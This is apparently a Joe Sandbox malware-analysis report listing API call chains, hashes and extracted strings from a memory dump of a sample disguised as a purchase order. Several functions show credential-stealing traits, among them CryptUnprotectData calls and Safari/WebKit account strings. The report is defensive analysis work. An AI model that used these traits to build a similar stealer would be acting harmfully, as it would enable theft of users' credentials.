                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              APIs
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@FilePointermemcpy
                                                              • String ID:
                                                              • API String ID: 609303285-0
                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1213725291-0
                                                              • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                              • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                              • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 2929817778-1134094380
                                                              • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                              • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
